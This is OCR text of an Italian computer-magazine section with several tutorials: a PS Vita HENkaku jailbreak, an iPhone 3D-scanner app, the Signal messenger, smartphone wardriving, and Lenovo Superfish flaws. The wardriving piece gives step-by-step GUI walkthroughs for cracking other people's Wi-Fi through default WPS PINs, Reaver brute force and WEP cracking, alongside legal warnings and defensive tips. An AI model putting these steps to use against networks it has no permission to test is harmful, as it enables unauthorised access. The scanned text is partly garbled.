farebbero decadere la garanzia sulla pe¬ 
riferica) e comporta una modifica alla 
console che è sostanzialmente alla por¬ 
tata di tutti. Henkaku è in parole semplici 
un exploit, cioè un particolare script che 
viene caricato nella memoria RAM della 
PS Vita e che quindi, una volta spenta la 
console, sparisce del tutto, non compro¬ 
mettendo così il funzionamento originale 
della console. L'hack, quindi, non va in 
nessun modo a sostituire o manomettere il 
firmware originale della console di gioco. 

Bypassare le protezioni 

L’idea del Tem Molecule è stata quella di 
aggirare le protezioni del sistema opera- 


Haino aperto 

la PS Vita! 






PS Vita | Per saperne di più 


Hacker in pratica C* 


tivo sfruttando un BoswerHax, ossia una 
vulnerabilità del browser che, se sfruttata 
a dovere, permette di ottenere i permessi 
in lettura e scrittura su tutte le cartelle del 
sistema operativo della console stessa. 
Ovviamente vale la pena ricordare che 
tali permessi permettono di eseguire ope¬ 
razioni complesse e abbastanza delicate 
che, se eseguite in modo errato, possono 
compromettere la stabilità operativo della 
console e il funzionamento corretto della 
nostra PS Vita. 

Trovata la falla... 

Inizialmente l'Henkaku hack era stato 
rilasciato come userland exploit, ossia un 
exploit (sostanzialmente una modifica) che 
non consentisse l’accesso con permessi di 
lettura e scrittura su tutte le cartelle e che 


quindi potesse solo avviare alcuni home- 
brew (codici non ufficiali e non firmati per 
l'esecuzione sulla console) rilasciati dagli 
utenti e non copie di backup dei giochi. 
Gli indizi rilasciati via tweet e via Web 
dal Team stesso, però, hanno fatto capire 
che l’userland exploit poteva nascondere 
l'accesso al Kernel exploit (ossia l’accesso 
completo a tutti i file e le cartelle del siste¬ 
ma operativo, con conseguente possibilità 
di caricare qualsiasi cosa al suo interno e 
di poterla eseguire indiscriminatamente). 
Immediatamente coder e sviluppatori si 
sono messi all'opera per effettuare il re¬ 
verse engineering del codice e scoprire 
le falle di questo exploit per trasformarlo 
in una sorta di chiave d'accesso (in gergo 
tecnico, glitch) che permette l'accesso ad 
ogni singola riga di codice del kernel origi¬ 


nario, permettendo così di poter caricare 
qualsiasi gioco o homebrew e di lanciarlo 
quasi direttamente dalla shell originale 
di PS Vita. 

Eseguiamo l’exploit 

Nell'articolo vedremo allora come seguire 
l'exploit con pochi e semplici passaggi, 
senza compromettere l’usabilità della 
console di gioco. Ricordiamo, inoltre, che 
per farlo è necessario avere una PS Vita 
aggiornata massimo al firmware 3.60. 
Necessitiamo, inoltre, di una memory 
card per l’inserimento dei codici home¬ 
brew o di qualsiasi altro file eseguibile, 
compreso il backup dei giochi. Anche la 
connessione alla rete domestica della 
console è necessaria (ma non il collega¬ 
mento a Internet). 


BASTAN010 PASSI PER "APRIRE" LA NOSTRA CONSOLE DI GIOCO 


1 


12:01 

Internet Connection Status 


IP Address 

192.168.2.100 


Sjbnet Mask 

255.255.255.0 


Default Gateway 

192.168.2.1 


Primary DNS 

192.168.2.1 



Prendiamo innanzitutto nota dell'indirizzo IP locale assegnato dal nostro router 
Wi-Fi alla console. L’informazione che ci serve è reperibile dalle impostazio¬ 
ni di rete o anche semplicemente facendo una verifica della configurazione 
di rete dal sistema. 


Torniamo quindi nella schermata principale della PS Vita e avviamo il brow¬ 
ser Internet cuccando sulla relativa bolla Browser in alto a sinistra. Potremo 
così collegarci a Internet per eseguire le semplici procedure descritte nei 
passi seguenti. 



Nella schermata principale del browser spostiamo la manina del cursore in 
alto sulla barra degli indirizzi e attiviamo la modalità scrittura per far compa¬ 
rire la tastiera virtuale a video. Quindi, digitiamo l’indirizzo http://go.henkaku. 
xyze premiamo Invio (tasto R2). 


In un tempo che può variare da qualche secondo a meno di un minuto parti¬ 
rà automaticamente l’hack della console di gioco. La conferma ci viene for¬ 
nita dal messaggio Welcome to HENkaku! che appare a tutto schermo sul 
display della PS Vita. 
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A questo punto premendo il pulsante OK che 
appare in basso al centro sullo schermo avviere¬ 
mo la Shell comandi di Molecule che provvederà 
a scaricare in automatico i file necessari all’avvio 
ed all'installazione del codice homebrew. 


Mettiamoci comodi per qualche minuto in attesa 
che l'hack faccia correttamente il suo lavoro. Se 
tutto è andato a buon fine, al termine della proce¬ 
dura ci ritroveremo la “bolla” del Team Molecule 
sulla schermata principale della console. 


Colleghiamoci adesso alla console dal PC in FTP, 
usando ad esempio il Client FileZilla (scaricabile gra¬ 
tuitamente da Win Extra). Basterà digitare nel cam¬ 
po Host l'indirizzo IP assegnato alla console e indi¬ 
care il numero della porta di trasferimento 1337. 




A questo punto per avviare l’applicazione (nel 
nostro caso abbiamo scelto un emulatore per 
SuperNES) basta cliccare sulla bolla desiderata 
nella schermata principale della PS Vita e iniziare 
a divertirci con i tanti retrogame disponibili! 


Non ci rimane altro da fare che copiare nella direc¬ 
tory UXO i nostri file .vpk (il ,vpk è il formato dei 
backup di PS Vita, degli Homebrew o degli emu¬ 
latori di retroconsole). Per farlo, da FileZilla è suf¬ 
ficiente trascinare i file nella cartella sulla memoria 
della PS Vita. 


Una volta terminato il caricamento del file nella 
memoria della console di gioco è sufficiente clic- 
carci sopra e seguire le istruzioni che appaiono 
sullo schermo per installarlo sulla nostra console 
e per ritrovarsi una nuova “bolla” nella scherma¬ 
ta principale. 



























Tutorial | Trasforma l'iphone in uno scanner 3D 


Hacker in pratica 


Con l'app giusta puoi digitalizzare e realizzare simpatici modelli 

grafici tridimensionali pronti per essere condivisi su Internet 


Trasforma riPhone 
in uno scanner 3D 


R ealizzare grafica 3D in tem¬ 
po reale utilizzando tablet 
e smartphone? Sì, è possibi¬ 
le grazie a Trimensional e alla sua 
app per iPhone e iPad chiamata 
3D Scanner. Semplice e intuitiva, 
questa applicazione permette di 


analizzare e digitalizzare oggetti 
della vita quotidiana e trasformarli 
rapidamente in modelli tridimen¬ 
sionali che possono essere salvati 
in una libreria personale o condivi¬ 
si in Rete. Come funziona? Sempli¬ 
ce. Al buio il tool illumina l'oggetto 


da riprodurre, scatta delle fotogra¬ 
fie e mediante alcuni algoritmi di 
interpolazione e processamen- 
to digitale ricostruisce una grafi¬ 
ca in tre dimensioni. Affasciante, 
vero? Bene, allora vediamo subito 
come procedere. 


Cosaci' —i 
occorre 

APP PER I0S 

TRIDIMENSIONAL 
3D SCANNER 

Quanto costa: € 0,99 
Sito Internet: 

https://itunes.apple.com 



Scarichiamo l’app 

Accediamo all’App Stare dall’iPhone o dall’iPad 
ed eseguiamo una ricerca per Trimensional 
3D Scanner. Digitiamo le nostre credenziali e 
installiamo l’applicazione. Il suo costo è di 0,99 euro. 
Terminata la procedura, tappiamo sul pulsante Apri 
per awiarla. 


Schermata iniziale 

Tocchiamo la i visibile in basso a destra. Per 
visualizzare il modello 3D una volta acquisito, 
abilitiamo l’opzione ShowScanAfterCaptu- 
re. Con la funzione Swing Scan On Loading , invece, 
visualizziamo un’immagine del modello tridimensiona¬ 
le che bascula in senso orizzontale. 



Spegniamo la luce 


a Una volta regolate le semplici opzioni dell’app, 
premiamo il pulsante Done per tornare alla 
schermata principale. Spegniamo la luce, 
inquadriamo l'oggetto da riprendere e premiamo l’ico¬ 
na che raffigura la macchina fotografica visibile al 
centro della schermata. 



Lasciamolo lavorare 

0 Trimensional illumina l’oggetto, scatta alcune 
fotografie e visualizza la sua visione 3D dell’og¬ 
getto. Se il risultato è gradito tocchiamo il 
quadratino con la freccia al centro, visibile in basso a 
sinistra, e selezioniamo Save to Camera M Altrimen¬ 
ti premiamo l’icona del cestino. 


Condividere i risultati 

Dalla schermata principale tappiamo l'icona 
del volto e poi 3D Scans in alto a sinistra. 
Selezioniamo l'oggetto 3D da condividere e 
tappiamo il pulsante quadrato con la freccia al centro, 
visibile in basso a sinistra. Selezioniamo EmailImage, 
completiamo il messaggio e diamo Invia. 


Ti mando una GIF animata 

Dalla schermata principale tappiamo ancora 
l’icona del volto e poi 3D Scans. Selezioniamo 
l’oggetto 3D. Premiamo il pulsante quadrata¬ 
lo con la freccia al centro e selezioniamo l’opzione Email 
Animateci GIF. Attendiamo qualche secondo, comple¬ 
tiamo il messaggio e diamo Invia. 
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Abbiamo scoperto l’app di messaaaistica che permette di scambiare 
informazioni in modo sicuro e anonimo. Sveliamone i segreti 


La chat segreta 
di Snowden 


N el più che saturo market del¬ 
le app di messaggistica cos'è 
che può realmente fare la dif¬ 
ferenza? “Meglio WhatsApp!”, “No, 
è meglio Telegram!". La risposta sta 
nel mezzo, lì dove convergono le no¬ 
stre necessità, in un contesto in cui 


ormai le app offrono qualsiasi tipo di 
servizio, dalle chat testuali alle tele¬ 
fonate VoIP e videochiamate. Ma c'è 
qualcosa verso cui sembrano ormai 
puntare tutti: la privacy. Ed è qui che 
primeggia Signal, l’app preferita da 
Edward Snowden (l'ex dipenden¬ 


te della CIA che ha dato il via allo 
scandalo Datagate) che sconfigge 
ogni tentativo di intrusione; grazie 
alla crittografia end-to-end risulta 
infatti impossibile da intercettare, 
così messaggi, file e chiamate reste¬ 
ranno al riparo da occhi indiscreti. 


Cosa ci 
occorre 



APP DI MESSAGGISTICA 
ISTANTANEA 

SIGNAL PRIVATE 
MESSENGER 

Quanto costa: Gratuita 
Sito Internet: 

https://itunes.apple.com 
Note: L’app è disponibile 
anche per Android 
sul sito https:// 
play.google.com 

V J 


••ooo vodafone IT ? 17:06 O 97% Wk 

^ Indietro Q] :EE 

n Signal - Private aJ 
Messenger 

Open Whisper Systems> 



Scarichiamo l’app sul melafonino 

1 ^. Apriamo il market di Apple (l’app è disponibile anche 
MI per Android) e cerchiamo signal tramite la tab con la 
J ™ lente di ingrandimento. Una volta trovata, tappiamo su 
INSTALLA. Attendiamo i secondi necessari allo scaricamento 
per poi ritrovare l’app nella home del nostro melafonino. 



Il codice di sicurezza è tutto! 

I a. Una volta inserito correttamente il numero di telefono, 
G| ci verrà recapitato un messaggio via SMS contenente 
J un codice di sicurezza (un po’ come avviene già sia 
per WhatsApp o Telegram, ad esempio). Inseriamolo manual¬ 
mente nel box e premiamo Registra. 


Serve il numero di telefono 

I *. All’avvio Signal ci chiederà il nostro numero di telefono, 
fondamentale per risultare attivi tramite questo servizio: 
V il numero, inoltre, contribuirà ad autogenerare unafirma 
digitale per rendere inespugnabili le chat e le chiamate scam¬ 
biate attraverso lo smartphone che viene usato. 


Ben arrivato! 

Signal permette di avere conversazioni 
private con i contatti esistenti. Per 
utilizzare Signal, si prega di consentire 
l'accesso ai tuoi contatti. 


Continua 


Il messaggio di benvenuto 

I a Un popup ci conferma l'avvenuta registrazione a Signal. 

^ L’interfaccia potrà sembrare spartana, in realtà mira alla 
-^■1 semplicità e alla velocità generale. Non troveremo ani¬ 
mazioni o emoji particolari, ma avremo la sicurezza di usare un 
sistema di comunicazione granitico. 
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MESSAGGI CRIPTATI ANCHE DAL PC 

Signal, seppur ancora in beta, approda anche su desktop. È disponibile, infatti, Signal Desktop, un plugin per 
Chrome che consente di sincronizzare i messaggi trasmessi tra un PC e un dispositivo Android. Al momento 
Signal Desktop non è in grado di sincronizzare i messaggi con iPhone, ma la compatibilità con iOS arriverà 
nei prossimi mesi. Inizialmente non è 
previsto il supporto per le chiamate, 
ma solo messaggi di testo. Una cu¬ 
riosità? Pergarantire la privacy totale, 
ad esempio, durante una chiamata 
sullo schermo sia del mittente sia del 
ricevente compariranno due parole: 
se queste combaciano, il meccanismo 
funziona. Signal si distingue tra molte 
altre app di crittografia proprio per la 
sua semplicità d'uso. Per scaricarlo è 
necessario raggiungere il sito www. 
winmagazine.it/link/3323 e unirsi al 
programma in beta tramite l'apposito 
tasto azzurro centrale. 
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APP DI MESSAGGISTICA A CONFRONTO 

Non tutte le applicazioni per dispositivi mobili integrano funzionalità 
di criptazione come Signal. Vediamo le differenze con gli altri programmi. 


APP 

Byte 

criptatiin 

transito? 

Il traffico è 
criptato anche 
al provider? 

Puoi verificare 
l'identità dei 
contatti? 

Ituoi messaggi 
archiviati sono al 
sicuro se perdi la 
tua chiave privata? 

Il codice 
dell'app 
è open 
source? 

WHATSAPP 

SI 

NO 

NO 

NO 

NO 

IMESSAGE 

SI 

SI 

NO 

SI 

NO 

TELEGRAM 

SI 

NO 

NO 

NO 

SI 

HANGOUTS 

SI 

NO 

NO 

NO 

NO 

MESSENGER 

(FACEBOOK) 

SI 

NO 

NO 

NO 

NO 

SIGNAL 

SI 

SI 

SI 

SI 

SI 

SKYPE 

SI 

NO 

NO 

NO 

NO 


Llmplementazione 
degli algoritmi di 
criptazione viene 
documentata? 


C'è stata una 
recente revisione 
del codice? 


NO 


|Nuovo Messaggio 


Invia 


QWERTYU I OP 


ASDFGHJKL 


•• voli* it 9 rr. 74 . 

. - 

lo Noverca 


Sicuro. Attivo. 


eating leprosy 



eating leprosy 



Vai con le Chat criptate! 


I a. Cliccando sull’icona + in alto a destra accederemo ai contatti che 
0 usano Signal. L’interfaccia ricorda Telegram, ma a parte le chat e 
le chiamate non ci sono funzioni che risultano inutili ad alcuni uten- 


Pronto? Non ci ascolta nessuno 

I a. A questo punto possiamo fare una telefonata senza il timore di 
UÈ essere ascoltati da qualcuno a nostra insaputa. Avviare una chia- 
mata a uno dei nostri contatti è davvero semplicissimo, non dovre- 


ti. I messaggi si possono comunque distruggere, in automatico o in manie- mo fare altro che tappare sulla cornetta che si trova all’interno della schie¬ 


ra programmata. 


da della Chat. 
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«M ATTENZIONE! 


Ricordiamo che violare le reti altrui 


è un reato perseguibile penalmente 


dalla legge italiana (art. 615-ter del 


codice penale). Le procedure da noi 


descritte, pertanto, devono essere 


utilizzate esclusivamente al fine 


di testare la sicurezza della prò 


pria rete locale Wi-Fi e, inter¬ 


venendo sulle impostazioni 


dei dispositivi, renderla 


invulnerabile a qualsiasi 
attacco esterno. 
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L a pratica del wardriving non sarebbe in 
sé negativa: consiste solo nell’individua- 
re una rete wireless e condividerne la 
posizione. Più pericoloso, e assolutamente 
illegale per la normativa italiana, è cercare 
di forzare la protezione delle reti wireless 
non di nostra proprietà e accedervi, allo 
scopo di navigare gratuitamente o anche 
per il solo gusto di scovarne le password. Per 
anni, dagli albori delle connessioni Wi-Fi 
protette con la fragile autenticazione WEP, 
hacker e pirati informatici si sono appostati 
agli angoli delle strade, muniti di notebook, 
per tentare di bypassare le difese delle reti 
wireless di ignari utenti. Oggi, che tutti ab¬ 
biamo in tasca un computer portatile cui 
abbiamo dato il nome di smartphone, questa 
pratica è ancora più semplice, oltre che più 
comoda e meno vistosa. 

Riconoscere il nemico 

Gli strumenti per violare le reti, infatti, sono 
stati sviluppati anche per la piattaforma An- 
droid e possono essere installati e utilizzati 
da chiunque (o meglio, da chiunque abbia 
uno smartphone compatibile con queste 
applicazioni e abbia accesso ai privilegi di 
root, cioè lo abbia sbloccato o “rootato”, come 
spesso si sente dire). E noi, come possiamo 
difenderci? Innanzitutto, conoscendo come 
combatte il nemico: vedremo negli esempi 
quali sono le tecniche utilizzate dagli hacker 
e le vulnerabilità di router e Access Point 
che vengono utilizzate e, di conseguenza, 
impareremo a configurare la nostra rete 
wireless per renderla immune a questo tipo 
di attacchi. Ricordiamo che le tecniche sono 
illustrate a solo scopo informativo e utiliz¬ 
zarle su reti senza fili per tentare di violarle, 
a meno che non siano di nostra proprietà, 
è un reato perseguibile dalla legge, quindi 
non provate a replicarle! 


C Hacker in pratica 


iJÌJ 


Per scovare e bucare una rete 
Wi-Fi basta uno smartphone. 
Vediamo come difenderci 


aiuenta mobile 















Il wardriving diventa mobile | Fai da te 


Hacker in pratica 


LA NOSTRA RETE WI-FIÈ SOTTO ATTACCO? DIFENDIAMOCI COSI 

Alla luce di dò che vedremo nell'articolo, ecco come possiamo configurare la nostra rete wireless per renderla immune ad ogni tipo di 
attacca e, in ogni caso, più sicura. 


UTILIZZARE LA 
PROTEZIONE WPA O WPA2 

La protezione WEP, come ormai ben 
sappiamo, è estremamente fragile, 
quindi facilmente aggirabile. Prefe¬ 
riamo i molto più robusti algoritmi di 
protezione basati su chiavi WPA. Se 
il nostro Access Point non prevede 
questo tipo di protezioni, è arrivato il 
momento di cambiarlo. 

SCEGLIAMO SEMPRE 
PASSWORD FORTI 

Parole chiave come"antonio1975" cioè 
formate dal proprio nome e dalla pro¬ 
pria data di nascita, sono le prime ad 
essere provate tramite un attacco con 
dizionario, che tenta l'accesso con pass¬ 
word "comuni". Scegliamo una parola 



router Wi-Fi con la sola pressione di un 
tasto. Se è una funzio¬ 
ne che non uti¬ 
lizziamo spesso, 
è però bene 
disattivarla in 
quanto è fonte di 


Se 


vulnerabilità e può essere sfruttata per 
ottenere l'accesso alla rete. Di norma 
router e Access Point prevedono la 
possibilità di disabilitarla. 

CREIAMO UNA 
SOTTORETE NELLA LAN 

; non utilizziamo spesso il 
Wi-Fi per condividere file e 
cartelle con i PC connessi 
via cavo, configuriamo 
la rete wireless in mo¬ 
do che sia differente da 
quella della rete cablata. 
In questo modo, anche se 
i pirati riuscissero a bucare il 
Wi-Fi ,non potrebbero arriva¬ 
re a computer o NAS connessi 
^ via cavo. 


chiave lunga e che contenga alcuni 
caratteri casuali. 


CAMBIAMO SPESSO 
LA CHIAVE D'ACCESSO 

Esattamente come per le chiavi di ca¬ 
sa, prima o poi la nostra parola chiave 
per l'accesso alla rete wireless do¬ 
mestica può circolare e finire in 
mani sbagliate. Cambiarla spesso, 
seguendo le direttive del punto 
precedente, è una buona abitu¬ 
dine per metterci al riparo da 
ogni tipo di attacco. 


DISABILITIAMO IL WPS 

L'autenticazione WPS permette di 
collegare e configurare qualsiasi 
dispositivo compatibile al ^ 



Password di default a rìschio 


Il primo attacco che il pirata prova per accedere senza autorizzazione ad una rete Wi-Fi consiste neN’utilizzare 
PIN WPS standard che le case produttrici di hardware a volte utilizzano per i loro router. 


^ a 0 16 48 

WPS Connect 

Vuoi installare questa 
applicazione? Avrà accesso a: 

AUCtSSU UlbHUSIIIVU 

# massimi privilegi per accedere a 
tutti gli stumenti e memoria del 
dispositivo 

accesso di rete completo 

connessione e disconnessione dal 
Wi-Fi 

visualizzazione connessioni di rete 
visualizzazione connessioni Wi-Fi 



16 56 


a Richiesta Superuser 


WPS Connect richiede l'accesso a 
Superuser. 

Attenzione se non comprendi cosa significhi 
dovresti negare l'accesso. 




WPS Connect 


• Solo per questa volta 

Ricorda questa scelta per 10 


^ La giusta applicazione 

Per prima cosa il pirata installa sul suo smart¬ 
phone Android l’app WPS Connect, che per¬ 
mette di provare ad accedere alle reti Wi-Fi tramite 
codici di default. Una volta awìata l'app, preme il tasto 
in alto a destra per cercare le reti wireless che suppor¬ 
tano l’autenticazione WPS. 


^ Scelta del bersaglio 

Ottenuta la lista delle reti presenti (vengono 
mostrate solo quelle che dispongono dell'au¬ 
tenticazione WPS attiva), il pirata tappa su quella che 
gli interessa, ottenendo la possibilità di provare alcuni 
PIN di default. Ne sceglie uno e conferma toccando il 
pulsante TryPIN. 


^ Permessi illimitati 

L’operazione richiede che il telefono disponga 
dei permessi di root, infatti potrebbe uscire la 
schermata che chiede all’utente di concederli all’app 
WPS Connect. Il pirata, owiamente, conferma. Se il PIN 
è valido il telefono si collega alla rete wireless e inizia 
a navigare a scrocco. ► 
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fBI©E II WPS è sotto attacco 


GLI SMARTPHONE 
COMPATIBILI 

Alcuni strumenti visti 
negli esempi, come 
Bcmon, non funzionano 
su tutti gli smartphone 
Android, ma solo su 
alcune serie e modelli 
che montano un speci¬ 
fico chipset Broadcom 
per il Wi-Fi: tra questi ci 
sono i Samsung Galaxy 
S ed S2, il NexusOnee 
il Nexus 7, come si vede 
dispositivi molto comu¬ 
ni e alla portata di tutti. 
Quindi confidare nella 
scarsa compatibilità 
degli strumenti è un 
errore. 

WPS, COSÌ? 

Il WPS è una modalità 
di autenticazione per 
le reti senza fili che 
consiste nel premere 
un pulsante sul router, 
uno sul dispositivo 
da abbinare (spesso 
virtuale, come nel 
caso di smartphone e 
tablet) e attendere che 
la transazione e l'abbi¬ 
namento avvengano 
automaticamente, 
senza inserire lunghe 
password alfanumeri¬ 
che. Anche se comodo e 
veloce, si è rivelato però 
poco sicuro in quanto 
fonte di vulnerabilità, 
come abbiamo visto 
nell'esempio. 


Se la via delle password di default dovesse fallire, il pirata non si perde d’animo. Il secondo 
tentativo che compie consiste nel trovare il PIN tramite la tecnica di attacco di tipo brute force. 



ù 0 17:05 

RfA 

C * 

InfostradaWiFi 

WPA2 4 

JL Telecom 



y 

ù 0 17:01 

,lll bcmon 


Vuoi installare questa 


applicazione? Avrà accesso a: 


^ Installazione delle app 

Se la procedura del Macropasso precedente non ha esito 
positivo, il pirata non si da per vinto e cerca di intercettare 
il PIN WPS forzando la rete wireless. Per far ciò installa sul telefono 
le applicazioni Bcmon (un monitor di rete) e Reaver (un brute torcer) 
per Android. 


y fl O 17:07 

<© RfA 

- Adjust Settings 

Automatic advanced settings v 

Autodetect best advanced settings 


Ecco le reti “bersaglio” 

Terminata l’Installazione delle due applicazioni, il pirata avvia 
Reaver e tappa OK sul messaggio in inglese che avvisa che 
l’hacking delle reti wireless è illegale. Dopo una breve scansione l’app 
mostra tutte le reti wireless presenti nelle vicinanze che supportano 
l’autenticazione WPS. 


y a 0 17:08 

! Richiesta Superuser 

bcmon richiede l'accesso a 
Superuser. 

Attenzione: se non comprendi cosa significhi 
dovresti negare l'accesso. 


Inizia l’attacco 

A questo punto il pirata tocca il nome della rete wireless 
che gli interessa per accedere alla pagina della configura¬ 
zione dei parametri di attacco. Il più delle volte i parametri di default 
sono sufficienti ai suoi scopi, quindi si limita a tappare sul pulsan¬ 
te Start attack. 



^ Una rete da sniffare 

^ L'applicazione lancia automaticamente anche Bcmon che, 
come l'app usata in precedenza, richiede che sul telefono ci 
siano i permessi di root. Una volta concesso, il pirata clicca su Yes 
alla domanda Instali firmware and Tools?, quindi su Enable moni¬ 
tor mode. 



^ Un monitoraggio costante 

Dopo che Bcmon conferma l'abilitazione della modali¬ 
tà monitor, un tap sulla freccia ritorta dello smartphone 
consente al pirata di tornare all’interfaccia principale di Rea¬ 
ver. Concessi anche ad essa i permessi di root, il pirata inizia a 
scanslonare la rete. 


^ Ci vuole tempo e pazienza 

L’analisi e la decriptazione del traffico può richiede molto tem¬ 
po, anche delle ore, e non è detto che vada a buon fine. In 
caso di esito positivo, però, il pirata ottiene il codice WPS da utiliz¬ 
zare, avvia l’app WPS Connect, seleziona la rete bersaglio e sceglie 
Trycustom PIN. 
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a Così buco le password WEP 

La prima forma di protezione delle reti wireless può essere scardinata facilmente: bastano gli strumenti giusti 
e un po’ di pazienza. Ecco come il pirata riesce a violare la nostra privacy con il suo smartphone. 


□ 

flO 18:48 

% AircrackGUI 


Vuoi installare questa 


applicazione? Avrà accesso a: 



^ Il cracker mobile 

La crittografia WEP è la prima utilizzata nelle reti wireless, e anche la 
meno sicura, ragion per quale è stata presto sostituita con la WPA. Per 
forzare le reti WEP il pirata non deve fare altro che installare sul suo smartphone 
Android l’app AircrackGUI. 


ÌQ flO 18:21 

?Auth Cattura/Deauth Inject 


Ferma Cattura 


CH 1 ][ Elapsed: 1 min ][ ][ Broken SKA 

BSSID PWR RXQ Beacons #Data. #/s CH MB 


^ Raccolta dei dati 

Con uno swipe verso sinistra si porta quindi nella schermata Catturai 
Deauth e preme il pulsante Avvia Cattura. Da questo momento in poi il 
programma inizia a fare il suo lavoro e ad intercettare i pacchetti tra i Client con¬ 
nessi alla rete locale e poi l’Access Point. 



Il pirata completa le sue operazioni 

Questa operazione serve a inviare pacchetti fasulli all'Access Point in 
modo che questo risponda e generi traffico. Quando i pacchetti raccolti 
sono sufficienti, il pirata clicca su Ferma Cattura e con un altro swipe si reca nel 
scheda Inject/Crack dall’interfaccia principale di AircrackGUI. 


^ Serve ancora Bcmon 

Come prima cosa, il pirata avvia nuovamente Bcmon e tappa su Enable 
monitor mode, quindi lancia AircrackGUI, concede i permessi di root, e 
preme Scan per avere l’elenco delle reti wireless disponibili. Dal menu che appa¬ 
re, poi, seleziona quale attaccare. 



^ Operazione effettuata con successo 

^ I pacchetti catturati sono indicati sotto la voce #Data e, affinché l’opera¬ 
zione abbia successo, è necessario raccoglierne circa 20.000/30.000, 
cosa che dipende da traffico sulla rete. Se questo scarseggia il pirata torna alla 
schermata precedente e clicca Avvia FakeAuth. 



^ La password è stata trovata 

Adesso al pirata non resta altro da fare che tappare su Avvia cracking e 
aspettare pazientemente: se è fortunato entro alcuni minuti la password 
dell'Access Point verrà indicata in chiaro con la percentuale di riuscita della 
decriptazione al 100%. 
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► 


ATTENZIONE! 

Ricordiamo che violare le reti altrui è 
un reato perseguibile penalmente dalla 
legge italiana (art. 615-ter del codice 
penale). Alcune delle procedure descritte 
nell'articolo, pertanto, devono essere 
usate esclusivamente al fine di te¬ 
stare la sicurezza della propria 
rete locale Wi-Fi e, interve¬ 
nendo sulle impostazioni 
dei dispositivi, renderla 
invulnerabile a qualsiasi 
attacco esterno. 


sì entrano 


nostro PC! 


Un pirata ci ha mostrato quanto 
è facile violare la nostra privacy 
sfruttando i bug dei dispositivi 


Q uando si acquista un computer nuovo, 
l’ultima cosa cui si pensa è che questo 
possa avere problemi di sicurezza. Do¬ 
potutto lo si è appena tirato fuori dalla sca¬ 
tola, si è aggiornato l’antivirus e Windows... 
e invece no. Abbiamo scoperto che anche 
sui computer nuovi possono nascondersi 
problemi, e anche seri. Nel corso deH’ultimo 
anno, in particolar modo, abbiamo riscon¬ 
trato problemi di sicurezza sui programmi 
preinstallati su alcuni computer Lenovo, Dell 
e Toshiba. Non solo: vulnerabili ad attacchi 
esterni si sono rivelati essere diversi modelli 
di router e addirittura anche i telefoni Sam¬ 
sung Galaxy S6 (ma probabilmente non solo 
questi). Buona parte dei problemi segnalati è 
facilmente risolvibile, spesso la soluzione è 
già stata messa a disposizione dai produttori 
stessi sotto forma di aggiornamento, ma non 
sempre è così. Molti produttori di router, 
difatti, non hanno ancora corretto problemi 
che possono compromettere il buon fun¬ 
zionamento del dispositivo, lasciando così 
gli utenti (spesso ignari della situazione) in 
braghe di tela. 

Ti spio dal tuo hardware 

Senza dire che molte volte le porte della no¬ 
stra vita privata vengono scardinate anche da 
software e applicazioni mobile assolutamente 
lecite che nelle mani sbagliate permettono di 
trasformare qualunque periferica hardware 
in un perfetto grimaldello virtuale. L’esem¬ 
pio più eclatante è forse l’app Cerberus che 
da potente antifurto per lo smartphone può 
trasformarsi in una perfetta e silenziona spia 
al servizio dei pirati informatici. E le brut¬ 
te notizie, purtroppo, non finiscono qua. 
Ma non disperiamo! Nelle prossime pagine 
sveleremo ciò che siamo riusciti a scoprire 
fornendo anche le relative soluzioni per ri¬ 
mettere al sicuro tutte le nostre periferiche. 


Cosa ci 
occorre difficile 


TOOL DI SICUREZZA 

HARDWARE 
PROTECTOR 
2017 _ 
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✓DVD 
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NOTEBOOK 


Lenovo 


Nonostante sia una delle società con il minor nu¬ 
mero di vulnerabilità scoperte nel corso del 2015 
(vedi box Un anno di insicurezza), anche Lenovo 
è caduta sotto i colpi delle vulnerabilità gravi. Si è 
difatti scoperto che questo produttore cinese che 
nel 2004 acquistò la divisione computer di IBM, tra 
il settembre del 2014 e il febbraio del 2015 ha distri¬ 
buito assieme ai software presenti su alcuni portatili 
anche un adware chiamato Superfish, utilizzato per 
inserire pubblicità all'interno di pagine Web HTTPS 
e capace di mettere a repentaglio la sicurezza degli 
utenti che lo utilizzano. 

A questo proposito la EFF (Electronic Frontier 
Foundation) ha avuto parole dure nei riguardi di 
Lenovo, affermando che"non solo ha inserito pub¬ 
blicità in maniera largamente inappropriata, ma ha 
creato una vera e propria catastrofe di sicurezza 
massiva. L'utilizzo di un certificato singolo per gli 
attacchi MITM (Men in thè Middle) implica che tutta 
la sicurezza dell'HTTPS è stata compromessa sui 
notebook Lenovo coinvolti" (www.winmagazine. 
it/link/3459). 


COSA RISCHIAMO 


In pratica, se si ha Superfish installato sul proprio 
computer, un qualunque malintenzionato che riesca 
a procurarsi la sua chiave privata potrebbe utilizzarla 
per rubarci le password della posta e dell'Internet 
Banking con la stessa facilità con la quale si ruba una 
caramella a un bambino. Visto che, a quanto pare, 
le chiavi private MITM di Superfish sono state tutte 
estratte e pubblicate on-iine, si capisce bene che 
ha ragione l'EFF quando afferma che avere usato 
un certificato MITM per inserire pubblicità nelle 
pagine HTTPS è una mossa da novellini e la scelta 
di distribuire questo software è stata "catastrofica¬ 
mente irresponsabile". 



■ Se tra i certificati "Trusted" compare Superfish, 
dobbiamo usare il tool Lenovo per eliminare la 
vulnerabilità. 


COME PROTEGGERCI 


Per scoprire se sul nostro PC è presente Superfish, 
LastPass ha creato un apposito software che tro¬ 
viamo nella sezione Speciali/Hardware Protector 
2017 del Win DVD-Rom. Visitando la pagina www. 
winmagazine.it/link/3460 scopriremo subito se 
siamo affetti dal malware e quali azioni eventual¬ 
mente intraprendere. Anche Lenovo ha realizzato un 
proprio tool per la rimozione di Superfish. Possiamo 
scaricarlo da www.winmagazine.it/link/3461 : basta 
un doppio clic per avviarlo e attendere la rimozione 
dello spyware. Se abbiamo acquistato un notebook 
Lenovo di recente, possiamo stare tranquilli: il pro¬ 
blema è stato risolto e i nuovi portatili non hanno 
traccia di malware. 



■ Dopo la scoperta del pasticcio con Superfish, 
Lenovo ha rilasciato un tool capace di eliminare 
l'adware dal portatile. 


PROBLEMI, PIÙ CHE SOLUZIONI 

Oltre al "problema'' Superfish, Lenovo è 
stata protagonista in negativo anche per 
un problema legato al Lenovo Solution 
Center, software preinstallato sui computer 
dell'azienda e utilizzato per effettuare un 
check del sistema e verificare se sono presen¬ 
ti programmi per la protezione da virus e altri 
malware o firewall. Recentemente la Compu¬ 
ter Emergency ReadinessTeam (CERT) della 
Carnegie Mellon's University di Pittsburgh 
(USA) ha scoperto che questo software soffre 
di diverse vulnerabilità, alcune delle quali 
potrebbero addirittura permettere ad un 
sito Web opportunamente realizzato, di ese¬ 
guire un qualunque software con privilegi 
di amministratore. Al momento Lenovo ha 
